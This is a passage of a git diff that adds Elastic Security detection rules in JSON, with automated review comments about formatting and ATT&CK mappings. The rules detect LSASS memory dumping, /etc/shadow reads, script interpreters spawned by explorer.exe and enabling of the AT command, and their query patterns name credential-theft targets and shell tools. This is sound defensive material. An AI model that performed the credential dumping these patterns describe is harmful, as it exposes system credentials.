"event.ingested", + 
"type": "eql", + "version": 3 + }, + "id": "994e40aa-8c85-43de-825e-15f665375ee8_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json new file mode 100644 index 00000000000..e25e44287e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_4.json 
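Review bot: The `setup` text renders a broken link: `Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` lacks the markdown square brackets that the neighbouring Elastic Defend link has, so the URL is shown as raw text beside the word; `[Winlogbeat](https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` fixes it. The same text appears in the 994e40aa-…_4.json hunk that follows, so both files need the change. The pipeline name is given as `-problem_child_ingest_pipeline` with a leading hyphen, which looks like a versioned prefix was dropped from the template; worth confirming against the installed pipeline name before users copy it into `winlogbeat.yml`.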
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score", + "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction_probability", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "994e40aa-8c85-43de-825e-15f665375ee8", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. 
Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "994e40aa-8c85-43de-825e-15f665375ee8_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json new file mode 100644 index 00000000000..022c4106449 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_209.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via LSASS Memory Dump", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* DLLs exporting MiniDumpWriteDump API to create an lsass mdmp*/\n winlog.event_data.CallTrace : (\"*dbghelp*\", \"*dbgcore*\") and\n\n /* case of lsass crashing */\n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\"\n )\n", + "references": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic:Execution", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 209 + }, + "id": "9960432d-9b26-409f-972b-839a959e79e2_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json new file mode 100644 index 00000000000..a84a8484ca2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208.json 
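Review bot: The `tags` array contains `"Tactic:Execution"` without the space that every other tag in this file and in the sibling rules uses (`"Tactic: Credential Access"`, `"Data Source: Sysmon"`); tag filters in the Security app match the literal string, so this rule would be missed by a `Tactic: Execution` filter. Change it to `"Tactic: Execution"`. The rest of the rule — the dbghelp/dbgcore call-trace match and the WerFault exclusions — reads consistently with the description.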
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Shadow File Read via Command Line Utilities", + "new_terms_fields": [ + "process.command_line", + "host.id", + "process.executable" + ], + "query": "host.os.type : \"linux\" and event.category : \"process\" and event.action : (\"exec\" or \"exec_event\") and\n(process.args : \"/etc/shadow\" or (process.working_directory: \"/etc\" and process.args: \"shadow\")) and not \n(process.executable : (\"/bin/chown\" or \"/usr/bin/chown\") and process.args : \"root:shadow\") and not \n(process.executable : (\"/bin/chmod\" or \"/usr/bin/chmod\") and process.args : \"640\")\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a3a3689-8ed1-4cdb-83fb-9506db54c61f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend 
Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "9a3a3689-8ed1-4cdb-83fb-9506db54c61f_208", + "type": "security-rule" +} \ No newline at end of file 
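Review bot: The `setup` text links the agent-policy guide at a pinned version, `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, while the macOS rule earlier in this commit and the other links in this same text use `/current/`; `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` keeps the guidance from going stale. On the ATT&CK side, the first `threat` entry maps to T1068 (Exploitation for Privilege Escalation), but the query only observes `/etc/shadow` being read, not how root was obtained; the Credential Access / T1003.008 mapping already describes what the rule detects, so the T1068 entry is worth a second look.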
diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json new file mode 100644 index 00000000000..c65e9ac22f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108.json 
@@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Explorer Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such 
as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + }, + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json new file mode 100644 index 00000000000..3e6a7b5bbfb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109.json 
@@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Explorer Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"rundll32.exe\", \"cmd.exe\", \"mshta.exe\", \"regsvr32.exe\") or\n process.pe.original_file_name in (\"cscript.exe\", \"wscript.exe\", \"PowerShell.EXE\", \"RUNDLL32.EXE\", \"Cmd.Exe\", \"MSHTA.EXE\", \"REGSVR32.EXE\")\n ) and\n /* Explorer started via DCOM */\n process.parent.name : \"explorer.exe\" and process.parent.args : \"-Embedding\" and\n not process.parent.args:\n (\n /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */\n \"/factory,{5BD95610-9434-43C2-886C-57852CC8A120}\",\n \"/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index 
(such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + }, + 
{ + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json new file mode 100644 index 00000000000..744c57ac710 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_108.json 
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Tasks AT Command Enabled", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\"\n ) and registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json new file mode 100644 index 00000000000..408e9b20baa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_109.json 
@@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Scheduled Tasks AT Command Enabled", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\"\n ) and registry.data.strings : (\"1\", \"0x00000001\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 